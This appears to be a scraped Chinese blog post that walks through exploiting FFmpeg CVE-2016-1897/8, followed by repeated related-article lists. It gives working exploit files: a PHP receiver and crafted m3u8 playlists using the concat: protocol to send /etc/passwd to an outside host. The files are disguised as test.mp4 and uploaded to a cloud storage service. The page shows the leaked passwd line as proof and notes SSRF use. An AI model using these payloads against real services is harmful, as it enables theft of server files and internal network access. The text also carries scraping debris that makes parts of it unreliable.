CVE-2016-1897/8 - FFMpeg vulnerability analysis
Vulnerability exploit methods are as follows:php
一共4個文件:
comm.php (接收用的 也能夠用監聽一個端口)
bash
code 區域url
<?php file_put_contents(time()."_test.txt",$_GET['x']); ?>
header.m3u8 (視頻格式文件)
spa
code 區域ssr
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://www.u-url.org/exp/movie/comm.php?x=
remote.m3u8 (第二次轉發的)
code
code 區域視頻
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://www.u-url.org/exp/movie/header.m3u8|http://baidu.com #EXT-X-ENDLIST
code 區域blog
http://baidu.com 也能夠換成 本地資源文件: /etc/passwd
test.mp4 (最終上傳觸發)
資源
code 區域rem
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://www.u-url.org/exp/movie/remote.m3u8 #EXT-X-ENDLIST
漏洞證實:
一切準備號了以後就上傳test.mp4到360雲盤上去。
code 區域
root:x:0:0:root:/root:/bin/bash
也能夠ssrf
Detailed content link:
https://habrahabr.ru/company/mailru/blog/274855/
相關文章
- 1. Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis
- 2. 轉:Awesome Vulnerability Research
- 3. Vulnerability Scanning
- 4. WebCruiser - Web Vulnerability Scanner
- 5. eyoucms 1.4.6 XSS vulnerability
- 6. Oracle TNS Poison Vulnerability
- 7. MS16-077--vulnerability
- 8. 15.Machine-Learning Supported Vulnerability Detection in Source Code
- 9. Web Vulnerability Scanner 破解
- 10. Open Wifi SSID Broadcast vulnerability
- 更多相關文章...
- • R 包 - R 語言教程
- • Flink 數據傳輸及反壓詳解
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis
- 2. 轉:Awesome Vulnerability Research
- 3. Vulnerability Scanning
- 4. WebCruiser - Web Vulnerability Scanner
- 5. eyoucms 1.4.6 XSS vulnerability
- 6. Oracle TNS Poison Vulnerability
- 7. MS16-077--vulnerability
- 8. 15.Machine-Learning Supported Vulnerability Detection in Source Code
- 9. Web Vulnerability Scanner 破解
- 10. Open Wifi SSID Broadcast vulnerability